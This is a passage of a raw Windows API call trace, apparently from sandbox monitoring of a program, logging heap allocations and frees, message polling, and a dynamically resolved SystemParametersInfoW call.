Size=0x10) returned 0x2aab488 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0254.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0254.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0254.924] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0254.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0254.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0254.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0254.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0254.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0254.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0254.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0254.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0254.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0254.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0254.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0254.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0254.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0254.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0254.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0254.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0254.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0254.930] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0254.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0254.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7040 [0254.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7040, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0254.931] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0254.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0254.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0254.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0254.932] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0255.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0255.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0255.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0255.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0255.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0255.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0255.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0255.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0255.052] FreeLibrary (hLibModule=0x76240000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0255.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: 